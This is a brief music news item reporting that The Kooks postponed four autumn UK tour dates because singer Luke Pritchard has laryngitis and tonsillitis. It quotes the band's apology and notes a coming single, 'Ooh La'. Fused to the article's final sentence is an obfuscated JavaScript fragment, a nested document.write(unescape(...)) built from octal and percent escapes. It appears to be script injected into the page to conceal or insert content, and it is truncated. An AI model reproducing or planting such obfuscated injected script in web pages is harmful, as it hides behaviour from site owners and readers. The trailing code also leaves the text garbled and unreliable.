The Kooks have cancelled a number of their upcoming UK tour dates due to singer Luke Pritchard suffering laryngitis and tonsillitis.
According a statement, Pritchard's doctor has told the singer to rest for six days.
The statement also goes on to say: "The band is devastated to have to let down so many fans who were looking forward to these shows, but they want it to be known they will honour the commitment with shows being rescheduled within a day or so."
The band said: "We are truly upset to all of the fans who have been waiting since May to see these shows. We do apologise, but Luke is really quite poorly. We will be back very, very soon and look forward to seeing you all there. Love, The Kooks."
The band have postponed the following dates:
Southampton Guildhall (September 30)
Norwich UEA (October 1)
Newcastle Academy (2)
Leeds University (3)
They are set to release new single 'Ooh La' on October 23.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
